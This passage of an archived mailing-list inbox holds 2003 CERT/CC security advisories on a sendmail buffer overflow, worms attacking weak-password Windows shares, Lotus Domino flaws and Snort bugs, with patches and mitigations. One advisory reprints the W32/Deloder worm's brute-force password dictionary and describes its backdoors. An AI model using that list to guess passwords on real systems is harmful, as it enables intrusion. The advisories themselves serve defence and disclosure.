weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2003 Carnegie Mellon University. Revision History Feb 21, 2003: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPlZDZmjtSoHZUTs5AQGBKwQAr+4iXdsjC3LcN3QB77+6uslWZlP4AZlG IXS4u50QPNhuFw/vnuOG2FM4bCSUE7h+nG3eyakS1dWO3jGyybMFWPyvykYeFUKQ 17QbmykeWBUVdGmxOeuVmSdmz7MSp6U+FZZmzuUWM85DlSUKoYg8dF7CqVuC137O Eisa8/wivlM= =p961 -----END PGP SIGNATURE----- From - Mon Mar 3 12:36:09 2003 X-UIDL: 3515 X-Mozilla-Status: 1001 X-Mozilla-Status2: 00000000 Return-Path: Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink4.berkeley.edu (8.12.7/8.12.3) with ESMTP id h23KWFlk037739; Mon, 3 Mar 2003 12:32:15 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.11.6/8.11.6/1.14) with SMTP id h23I7qK08671; Mon, 3 Mar 2003 13:07:52 -0500 Date: Mon, 3 Mar 2003 13:07:52 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2003-07 Remote Buffer Overflow in Sendmail Precedence: bulk Status: RO X-Status: X-Keywords: X-UID: 78 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2003-07 Remote Buffer Overflow in Sendmail Original release date: March 3, 2003 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Sendmail Pro (all versions) * Sendmail Switch 2.1 prior to 2.1.5 * Sendmail Switch 2.2 prior to 2.2.5 * Sendmail Switch 3.0 prior to 3.0.3 * Sendmail for NT 2.X prior to 2.6.2 * Sendmail for NT 3.0 prior to 3.0.3 * Systems running open-source sendmail versions prior to 8.12.8, including UNIX and Linux systems Overview There is a vulnerability in sendmail that may allow remote attackers to gain the privileges of the sendmail daemon, typically root. I. Description Researchers at Internet Security Systems (ISS) have discovered a remotely exploitable vulnerability in sendmail. This vulnerability could allow an intruder to gain control of a vulnerable sendmail server. Most organizations have a variety of mail transfer agents (MTAs) at various locations within their network, with at least one exposed to the Internet. Since sendmail is the most popular MTA, most medium-sized to large organizations are likely to have at least one vulnerable sendmail server. In addition, many UNIX and Linux workstations provide a sendmail implementation that is enabled and running by default. This vulnerability is message-oriented as opposed to connection-oriented. That means that the vulnerability is triggered by the contents of a specially-crafted email message rather than by lower-level network traffic. This is important because an MTA that does not contain the vulnerability will pass the malicious message along to other MTAs that may be protected at the network level. In other words, vulnerable sendmail servers on the interior of a network are still at risk, even if the site's border MTA uses software other than sendmail. Also, messages capable of exploiting this vulnerability may pass undetected through many common packet filters or firewalls. Sendmail has indicated to the CERT/CC that this vulnerability has been successfully exploited in a laboratory environment. We do not believe that this exploit is available to the public. However, this vulnerability is likely to draw significant attention from the intruder community, so the probability of a public exploit is high. A successful attack against an unpatched sendmail system will not leave any messages in the system log. However, on a patched system, an attempt to exploit this vulnerability will leave the following log message: Dropped invalid comments from header address Although this does not represent conclusive evidence of an attack, it may be useful as an indicator. A patched sendmail server will drop invalid headers, thus preventing downstream servers from receiving them. The CERT/CC is tracking this issue as VU#398025. This reference number corresponds to CVE candidate CAN-2002-1337. For more information, please see http://www.sendmail.org http://www.sendmail.org/8.12.8.html http://www.sendmail.com/security/ http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21950 http://www.kb.cert.org/vuls/id/398025 II. Impact Successful exploitation of this vulnerability may allow an attacker to gain the privileges of the sendmail daemon, typically root. Even vulnerable sendmail servers on the interior of a given network may be at risk since the vulnerability is triggered from the contents of a malicious email message. III. Solution Apply a patch from Sendmail Sendmail has produced patches for versions 8.9, 8.10, 8.11, and 8.12. However, the vulnerability also exists in earlier versions of the code; therefore, site administrators using an earlier version are encouraged to upgrade to 8.12.8. These patches are located at ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.security.cr.patch ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.11.6.security.cr.patch ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.9.3.security.cr.patch Apply a patch from your vendor Many vendors include vulnerable sendmail servers as part of their software distributions. We have notified vendors of this vulnerability and recorded their responses in the systems affected section of VU#398025. Several vendors have provided a statement for direct inclusion in this advisory; these statements are available in Appendix A. Enable the RunAsUser option There is no known workaround for this vulnerability. Until a patch can be applied, you may wish to set the RunAsUser option to reduce the impact of this vulnerability. As a good general practice, the CERT/CC recommends limiting the privileges of an application or service whenever possible. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Apple Computer, Inc. Security Update 2003-03-03 is available to fix this issue. Packages are available for Mac OS X 10.1.5 and Mac OS X 10.2.4. It should be noted that sendmail is not enabled by default on Mac OS X, so only those systems which have explicitly enabled it are susceptible to the vulnerability. All customers of Mac OS X, however, are encouraged to apply this update to their systems. Avaya, Inc. Avaya is aware of the vulnerability and is investigating impact. As new information is available this statement will be updated. BSD/OS Wind River Systems has created patches for this problem which are available from the normal locations for each release. The relevant patches are M500-006 for BSD/OS version 5.0 or the Wind River Platform for Server Appliances 1.0, M431-002 for BSD/OS 4.3.1, or M420-032 for BSD/OS 4.2 systems. Cisco Systems Cisco is investigating this issue. If we determine any of our products are vulnerable that information will be available at: http://www.cisco.com/go/psirt Cray Inc. The code supplied by Cray, Inc. in Unicos, Unicos/mk, and Unicos/mp may be vulnerable. Cray has opened SPRs 724749 and 724750 to investigate. Cray, Inc. is not vulnerable for the MTA systems. Hewlett-Packard Company SOURCE: Hewlett-Packard Company HP Services Software Security Response Team x-ref: SSRT3469 sendmail HP will provide notice of the availability of patches through standard security bulletin announcements and be available from your normal HP Services support channel. IBM Corporation The AIX operating system is vulnerable to the sendmail issues discussed in releases 4.3.3, 5.1.0 and 5.2.0. A temporary patch is available through an efix package which can be found at ftp://ftp.software.ibm.com/aix/efixes/security/sendmail_efix.tar.Z IBM will provide the following official fixes: APAR number for AIX 4.3.3: IY40500 (available approx. 03/12/2003) APAR number for AIX 5.1.0: IY40501 (available approx. 04/28/2003) APAR number for AIX 5.2.0: IY40502 (available approx. 04/28/2003) Openwall GNU/*/Linux Openwall GNU/*/Linux is not vulnerable. We use Postfix as the MTA, not sendmail. Red Hat Inc. Updated sendmail packages that are not vulnerable to this issue are available for Red Hat Linux, Red Hat Advanced Server, and Red Hat Advanced Workstation. Red Hat Network users can update their systems using the 'up2date' tool. Red Hat Linux: http://rhn.redhat.com/errata/RHSA-2003-073.html Red Hat Linux Advanced Server, Advanced Workstation: http://rhn.redhat.com/errata/RHSA-2003-074.html SGI SGI acknowledges VU#398025 reported by CERT and has released an advisory to address the vulnerability on IRIX. Refer to SGI Security Advisory 20030301-01-P available from ftp://patches.sgi.com/support/free/security/advisories/20030301-01-P or http://www.sgi.com/support/security/. The Sendmail Consortium The Sendmail Consortium suggests that sites upgrade to 8.12.8 if possible. Alternatively, patches are available for 8.9, 8.10, 8.11, and 8.12 on http://www.sendmail.org/ Sendmail, Inc. All commercial releases including Sendmail Switch, Sendmail Advanced Message Server (which includes the Sendmail Switch MTA), Sendmail for NT, and Sendmail Pro are affected by this issue. Patch information is available at http://www.sendmail.com/security. _________________________________________________________________ Our thanks to Internet Security Systems, Inc. for discovering this problem, and to Eric Allman, Claus Assmann, and Greg Shapiro of Sendmail for notifying us of this problem. We thank both groups for their assistance in coordinating the response to this problem. _________________________________________________________________ Authors: Jeffrey P. Lanza and Shawn V. Hernan ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2003-07.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2003 Carnegie Mellon University. Revision History Mar 03, 2003: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPmOZEWjtSoHZUTs5AQGNUwP/YC0aRMqrFoLxUjG9pZIOBb98z8BFPfTW w/5u09rcW7WpH52XGaOWbu9PYtnLKtPaMrwevc38r6ILvZywasxdpUcUtR4W9XPZ 9EW4LYB1EaU81PLpzkQXWkVAhlX4vgHTU75oEcjfsacxXHlxtMYM1JpmyO8gvlnl pD4vLdvJqHE= =PfHu -----END PGP SIGNATURE----- From - Thu Mar 13 09:51:20 2003 X-UIDL: 3 X-Mozilla-Status: 0001 X-Mozilla-Status2: 00000000 Return-Path: Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink4.berkeley.edu (8.12.8/8.12.3) with ESMTP id h2C3FxLZ116752; Tue, 11 Mar 2003 19:16:00 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.11.6/8.11.6/1.14) with SMTP id h2BM3uU01105; Tue, 11 Mar 2003 17:03:56 -0500 Date: Tue, 11 Mar 2003 17:03:56 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2003-08 Increased Activity Targeting Windows Shares Precedence: bulk Status: RO X-Status: X-Keywords: X-UID: 79 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2003-08 Increased Activity Targeting Windows Shares Original release date: March 11, 2003 Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Microsoft Windows 2000 * Microsoft Windows XP Overview In recent weeks, the CERT/CC has observed an increase in the number of reports of systems running Windows 2000 and XP compromised due to poorly protected file shares. I. Description Over the past few weeks, the CERT/CC has received an increasing number of reports of intruder activity involving the exploitation of Null (i.e., non-existent) or weak Administrator passwords on Server Message Block (SMB) file shares used on systems running Windows 2000 or Windows XP. This activity has resulted in the successful compromise of thousands of systems, with home broadband users' systems being a prime target. Recent examples of such activity are the attack tools known as W32/Deloder, GT-bot, sdbot, and W32/Slackor, which are described in more detail below. Background Microsoft Windows uses the SMB protocol to share files and printer resources with other computers. In older versions of Windows (e.g., 95, 98, Me, and NT), SMB shares ran on NetBIOS over TCP/IP (NBT) on ports 137/tcp and udp, 138/udp, and 139/tcp. However, in later versions of Windows (e.g., 2000 and XP), it is possible to run SMB directly over TCP/IP on port 445/tcp. Windows file shares with poorly chosen or Null passwords have been a recurring security risk for both corporate networks and home users for some time: * IN-2002-06: W32/Lioten Malicious Code * CA-2001-20: Continuing Threats to Home Users * IN-2000-02: Exploitation of Unprotected Windows Networking Shares * IN-2000-03: 911 Worm It has often been the case that these poorly configured shares were exposed to the Internet. Intruders have been able to leverage poorly protected Windows shares by exploiting weak or Null passwords to access user-created and default administrative shares. This problem is exacerbated by another relevant trend: intruders specifically targeting Internet address ranges known to contain a high density of weakly protected systems. As described in CA-2001-20, the intruders' efforts commonly focus on addresses known to be used by home broadband connections. Recent developments The CERT/CC has recently received a number of reports of exploitation of Null or weak Administrator passwords on systems running Windows 2000 or Windows XP. Thousands of systems have been compromised in this manner. Although the tools involved in these reports vary, they exhibit a number of common traits, including * scanning for systems listening on 445/tcp (frequently within the same /16 network as the infected host) * exploiting Null or weak passwords to gain access to the Administrator account * opening backdoors for remote access * connecting back to Internet Relay Chat (IRC) servers to await additional commands from attackers * installing or supporting tools for use in distributed denial-of-service (DDoS) attacks Some of the tools reported have self-propagating (i.e., worm) capabilities, while others are propagated via social engineering techniques similar to those described in IN-2002-03: Social Engineering Attacks via IRC and Instant Messaging. The network scanning associated with this activity is widespread but appears to be especially concentrated in address ranges commonly associated with home broadband users. Using these techniques, many attackers have built sizable networks of DDoS agents, each comprised of thousands of compromised systems. W32/Deloder The self-propagating W32/Deloder malicious code is an example of the intruder activity described above. It begins by scanning the /16 (i.e., addresses with the same first two high-order octets) of the infected host for systems listening on 445/tcp. When a connection is established, W32/Deloder attempts to compromise the Administrator account by using a list of pre-loaded passwords. Variants may include different or additional passwords, but reports to the CERT/CC indicate that the following have appeared thus far: [NULL] 0 000000 00000000 007 1 110 111 111111 11111111 12 121212 123 123123 1234 12345 123456 1234567 12345678 123456789 1234qwer 123abc 123asd 123qwe 2002 2003 2600 54321 654321 88888888 Admin Internet Login Password a aaa abc abc123 abcd admin admin123 administrator alpha asdf computer database enable foobar god godblessyou home ihavenopass login love mypass mypass123 mypc mypc123 oracle owner pass passwd password pat patrick pc pw pw123 pwd qwer root secret server sex super sybase temp temp123 test test123 win xp xxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx yxcv zxcv On successful compromise of the Administrator account, W32/Deloder copies itself to the victim, placing multiple copies in various locations on the system. Additionally, it adds a registry key that will cause the automatic execution of dvldr32.exe (one of the aforementioned copies). The victim will begin scanning for other systems to infect after it is restarted. W32/Deloder opens up backdoors on the victim system to allow attackers further access. It does this in two ways: 1. attempting to connect to one of a number of pre-configured IRC servers 2. installing a copy of VNC (Virtual Network Computing), an open-source remote display tool from AT&T, listening on 5800/tcp or 5900/tcp Note: VNC in and of itself is not a malicious tool, and has many other legitimate uses. During the course of infection by W32/Deloder, a number of files may be created on the system. Reports indicate that files matching the following descriptions have been found on compromised systems: Filename File Size (bytes) Description dvldr32.exe 745,984 The self-propagating malicious code inst.exe 684,562 This file installs the backdoor applications onto the victim host psexec.exe 36,352 A copy of the Remote Process Launch application (not inherently malicious, but it is what allows the worm to replicate) explorer.exe 212,992 A renamed copy of the VNC application omnithread_rt.dll 57,344 VNC dependency file VNCHooks.dll 32,768 VNC dependency file rundll32.exe 29,336 The IRC-Pitchfork bot application cygwin1.dll 944,968 IRC-Pitschfork dependency file GT-bot and sdbot Intruders frequently use IRC "bots" (automated software that accepts commands via IRC channels) to remotely control compromised systems. GT-bot and sdbot are two examples of intruder-developed IRC bots. Both support automated scanning and exploitation of inadequately protected Windows shares. These tools also offer intruders a variety of DDoS capabilities, including the ability to generate ICMP, UDP, or TCP traffic. Tools like these are undergoing constant development in the intruder community and are frequently included as part of other tools. As a result, the names, sizes, and other characteristics of the files that might contain these tools vary widely. Furthermore, once installed, the tools are designed to hide themselves fairly well, so detection may be difficult. The CERT/CC has received reports of sdbot networks as large as 7,000 systems, and GT-bot networks in excess of 140,000 systems. W32/Slackor The W32/Slackor worm is another example of a tool that targets file shares. On a compromised machine, the worm begins by scanning the /16 of the infected host for other systems listening on 445/tcp. When a system is discovered, W32/Slackor connects to the $IPC share using a set of pre-programmed usernames and passwords, copies itself to the C:\sp directory, and runs its payload. The payload consists of the following files: Filename Description slacke-worm.exe The self-propagating malicious code abc.bat List of usernames/passwords psexec.exe A copy of the Remote Process Launch application (from sysinternals.com, used for replicating the worm) main.exe The bot application W32/Slackor also contains an IRC bot. When this bot joins its IRC network, a remote intruder controlling the IRC channel can issue arbitrary commands on the compromised computer, including launching denial-of-service attacks. Network footprint Widespread scanning for 445/tcp indicates activity of this type. Compromised hosts may also have unauthorized connections to IRC servers (typically on 6667/tcp, although ports may vary). Additionally, the VNC package installed by W32/Deloder will typically listen on 5800/tcp or 5900/tcp. If a compromised system is used in a DDoS attack on another site, large volumes of IP traffic (ICMP, UDP, or TCP) may be detected emanating from the compromised system. II. Impact The presence of any of these tools on a system indicates that the Administrator password has likely been compromised, and the entire system is therefore suspect. With this level of access, intruders may * exercise remote control * expose confidential data * install other malicious software * change files * delete files * launch attacks against other sites The scanning activities of these tools may generate high volumes of 445/tcp traffic. As a result, some Internet-connected hosts or networks with compromised hosts may experience performance issues (including denial-of-service conditions). Sites targeted by the DDoS agents installed by this activity may experience unusually heavy traffic volumes or high packet rates, resulting in degradation of services or loss of connectivity altogether. III. Solution In addition to following the steps outlined in this section, the CERT/CC encourages home users to review the "Home Network Security" and "Home Computer Security" documents. Disable or secure file shares Best practice dictates a policy of least privilege; if a given computer is not intended to be a server (i.e., share files with others), "File and Printer Sharing for Microsoft Networks" should be disabled. For computers that export shares, ensure that user authentication is required and that each account has a well-chosen password. Furthermore, consider using a firewall to control which computer can access these shares. By default, Windows NT, 2000, and XP create certain hidden and administrative shares. See the HOW TO: Create and Delete Hidden or Administrative Shares on Client Computers for further guidelines on managing these shares. Use strong passwords The various tools described above exploit the use of weak or Null passwords in order to propagate, so using strong passwords can help keep them from infecting your systems. Microsoft has posted a "Create Strong Passwords" checklist. Run and maintain an anti-virus product The malicious code being distributed in these attacks is under continuous development by intruders, but most anti-virus software vendors release frequently updated information, tools, or virus databases to help detect and recover from the malicious code involved in this activity. Therefore, it is important that users keep their anti-virus software up to date. The CERT/CC maintains a partial list of anti-virus vendors. Many anti-virus packages support automatic updates of virus definitions. The CERT/CC recommends using these automatic updates when available. Do not run programs of unknown origin Never download, install, or run a program unless you know it to be authored by a person or company that you trust. Users of IRC, Instant Messaging (IM), and file-sharing services should be particularly wary of following links or running software sent to them by other users, as this is a commonly used method among intruders attempting to build networks of DDoS agents. Deploy a firewall The CERT/CC also recommends using a firewall product, such as a network appliance or a personal firewall software package. In some situations, these products may be able to alert users to the fact that their machine has been compromised. Furthermore, they have the ability to block intruders from accessing backdoors over the network. However, no firewall can detect or stop all attacks, so it is important to continue to follow safe computing practices. Ingress/egress filtering Ingress filtering manages the flow of traffic as it enters a network under your administrative control. In the network usage policy of many sites, external hosts are only permitted to initiate inbound traffic to machines that provide public services on specific ports. Thus, ingress filtering should be performed at the border to prohibit externally initiated inbound traffic to non-authorized services. Egress filtering manages the flow of traffic as it leaves a network under your administrative control. There is typically limited need for internal systems to access SMB shares across the Internet. In the case of the intruder activity described above, blocking connections to port 445/tcp from entering or leaving your network reduces the risk of external infected systems attacking hosts inside your network or vice-versa. Recovering from a system compromise If you believe a system under your administrative control has been compromised, please follow the steps outlined in Steps for Recovering from a UNIX or NT System Compromise IV. References 1. Trends in Denial of Service Attack Technology: http://www.cert.org/archive/pdf/DoS_trends.pdf 2. Managing the Threat of Denial-of-Service Attacks: http://www.cert.org/archive/pdf/Managing_DoS.pdf 3. IN-2002-06: W32/Lioten Malicious Code: http://www.cert.org/incident_notes/IN-2002-06.html 4. CA-2001-20: Continuing Threats to Home Users: http://www.cert.org/advisories/CA-2001-20.html 5. IN-2000-02: Exploitation of Unprotected Windows Networking Shares: http://www.cert.org/incident_notes/IN-2000-02.html 6. IN-2000-03: 911 Worm: http://www.cert.org/incident_notes/IN-2000-03.html 7. IN-2002-03: Social Engineering Attacks via IRC and Instant Messaging: http://www.cert.org/incident_notes/IN-2002-03.html 8. VNC (Virtual Network Computing): http://www.uk.research.att.com/vnc/ 9. Home Network Security: http://www.cert.org/tech_tips/home_networks.html 10. Home Computer Security: http://www.cert.org/homeusers/HomeComputerSecurity/ 11. HOW TO: Create and Delete Hidden or Administrative Shares on Client Computers: http://support.microsoft.com/default.aspx?scid=kb;en-us;Q314984&sd =tech 12. Checklist: Create Strong Passwords: http://www.microsoft.com/security/articles/password.asp 13. Anti-virus vendors: http://www.cert.org/other_sources/viruses.html#VI 14. Steps for Recovering from a UNIX or NT System Compromise: http://www.cert.org/tech_tips/win-UNIX-system_compromise.html Reporting The CERT/CC is interested in receiving reports of this activity. If machines under your administrative control are compromised, please send mail to cert@cert.org with the following text included in the subject line: "[CERT#36888]". _________________________________________________________________ Feedback can be directed to the authors: Allen Householder and Roman Danyliw ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2003-08.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2003 Carnegie Mellon University. Revision History March 11, 2003: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPm5bd2jtSoHZUTs5AQGJkQQAskLQbGaPphIDbOdtvazUNJTuXroPQNyo 5Fw2RNeKkr3ECvmtuRRqDaDUyx1mziCDz8i655twWsY5k1Jexl+WICLlFvvf5jpA bgJYskeEagBNAGlkvAZuI48tOtC/O3M01dTLzVmN083Tqn22ZXl/w5nHMVu4y81t XqROPqun25M= =hbFj -----END PGP SIGNATURE----- From - Wed Mar 26 12:27:33 2003 X-UIDL: 3998 X-Mozilla-Status: 0001 X-Mozilla-Status2: 00000000 Return-Path: Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink4.berkeley.edu (8.12.8/8.12.3) with ESMTP id h2QKAbVk363115; Wed, 26 Mar 2003 12:10:37 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.11.6/8.11.6/1.14) with SMTP id h2QGgjN22519; Wed, 26 Mar 2003 11:42:45 -0500 Date: Wed, 26 Mar 2003 11:42:45 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2003-11 Multiple Vulnerabilities in Lotus Notes and Domino Precedence: bulk Status: RO X-Status: X-Keywords: X-UID: 80 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2003-11 Multiple Vulnerabilities in Lotus Notes and Domino Original release date: March 26, 2003 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Lotus Notes and Domino versions prior to 5.0.12 and 6.0 Gold * VU#571297 affects 5.0.12, 6.0.1 and prior versions. Overview Multiple vulnerabilities have been reported to affect Lotus Notes clients and Domino servers. Multiple reporters, the close timing, and some ambiguity caused confusion about what releases are vulnerable. We are issuing this advisory to help clarify the details of the vulnerabilities, the versions affected, and the patches that resolve these issues. I. Description In February 2003, NGS Software released several advisories detailing vulnerabilities affecting Lotus Notes and Domino. The following vulnerabilities reported by NGS Software affect versions of Lotus Domino prior to 5.0.12 and 6.0: VU#206361 - Lotus iNotes vulnerable to buffer overflow via PresetFields FolderName field Lotus Technical Documentation: KSPR5HUQ59 NGS Software's Advisory: NISR17022003b VU#355169 - Lotus Domino Web Server vulnerable to denial of service via incomplete POST request Lotus Technical Documentation: KSPR5HTQHS NGS Software's Advisory: NISR17022003d VU#542873 - Lotus iNotes vulnerable to buffer overflow via PresetFields s_ViewName field Lotus Technical Documentation: KSPR5HUPEK NGS Software's Advisory: NISR17022003b VU#772817 - Lotus Domino Web Server vulnerable to buffer overflow via non-existent "h_SetReturnURL" parameter with an overly long "Host Header" field Lotus Technical Documentation: KSPR5HTLW6 NGS Software's Advisory: NISR17022003a The following vulnerability reported by NGS Software affects versions of Lotus Domino up to and including 5.0.12 and 6.0.1: VU#571297 - Lotus Notes and Domino COM Object Control Handler contains buffer overflow Lotus Technical Documentation: SWG21104543 NGS Software's Advisory: NISR17022003e VU#571297 was originally reported as a vulnerability in an iNotes ActiveX control. The vulnerable code is not specific to iNotes or ActiveX. The iNotes ActiveX control was an attack vector for the vulnerability and is not the affected code base. Because this issue is not specific to ActiveX, Lotus Notes clients and Domino Servers running on platforms other than Microsoft Windows may be affected. In March 2003, Rapid7, Inc. released several advisories. The following vulnerabilities, reported by Rapid7, Inc., affect versions of Lotus Domino prior to 5.0.12: VU#433489 - Lotus Domino Server susceptible to a pre-authentication buffer overflow during Notes authentication Lotus Technical Documentation: DBAR5CJJJS Rapid7, Inc.'s Advisory: R7-0010 VU#411489 - Lotus Domino Web Retriever contains a buffer overflow vulnerability Lotus Technical Documentation: KSPR5DFJTR Rapid7, Inc.'s Advisory: R7-0011 Rapid7, Inc. also discovered that Lotus Domino pre-release and beta versions of 6.0 were also affected by the following vulnerability: VU#583184 - Lotus Domino R5 Server Family contains multiple vulnerabilities in LDAP handling code Lotus Technical Documentation: DWUU4W6NC8 Rapid7, Inc.'s Advisory: R7-0012 VU#583184 was a regression of the PROTOS LDAP Test-Suite from CA-2001-18 and was originally fixed in 5.0.7a. II. Impact The impact of these vulnerabilities range from denial of service to data corruption and the potential to execute arbitrary code. For details about the impact of a specific vulnerability, please see the related vulnerability note. III. Solution Upgrade Most of these vulnerabilities are resolved in versions 5.0.12 and 6.0.1 of Lotus Domino. Only VU#571297, "Lotus Notes and Domino COM Object Control Handler contains buffer overflow," is not resolved in 5.0.12, or 6.0.1. Critical Fix 1 for 6.0.1 was released on March 18, 2003, to resolve this issue for both the Notes client and Domino server. Apply a patch Patches are available for some vulnerabilities. Please view the individual vulnerability notes for specific patch information. Block access from outside the network perimeter Lotus Domino servers listen on port 1352/TCP. Notes may also be configured to listen on other ports, such as NETBIOS, SPX, or XPC. Blocking access to these ports from machines outside your trusted network perimeter may help mitigate successful exploitation of these vulnerabilities. Appendix A - References 1. http://www.kb.cert.org/vuls/id/571297 2. http://www.kb.cert.org/vuls/id/206361 3. http://www.ibm.com/Search?v=11 Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink4.berkeley.edu (8.12.9/8.12.3) with ESMTP id h3HI0Abu406042; Thu, 17 Apr 2003 11:00:10 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.11.6/8.11.6/1.14) with SMTP id h3HFV1V10726; Thu, 17 Apr 2003 11:31:01 -0400 Date: Thu, 17 Apr 2003 11:31:01 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2003-13 Multiple Vulnerabilities in Snort Preprocessors Precedence: bulk Status: RO X-Status: X-Keywords: X-UID: 81 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2003-13 Multiple Vulnerabilities in Snort Preprocessors Original release date: April 17, 2003 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Snort IDS, versions 1.8 through 2.0 RC1 Overview There are two vulnerabilities in the Snort Intrusion Detection System, each in a separate preprocessor module. Both vulnerabilities allow remote attackers to execute arbitrary code with the privileges of the user running Snort, typically root. I. Description The Snort intrusion detection system ships with a variety of preprocessor modules that allow the user to selectively include additional functionality. Researchers from two independent organizations have discovered vulnerabilities in two of these modules, the RPC preprocessor and the "stream4" TCP fragment reassembly preprocessor. For additional information regarding Snort, please see http://www.snort.org/. VU#139129 - Heap overflow in Snort "stream4" preprocessor (CAN-2003-0029) Researchers at CORE Security Technologies have discovered a remotely exploitable heap overflow in the Snort "stream4" preprocessor module. This module allows Snort to reassemble TCP packet fragments for further analysis. To exploit this vulnerability, an attacker must disrupt the state tracking mechanism of the preprocessor module by sending a series of packets with crafted sequence numbers. This causes the module to bypass a check for buffer 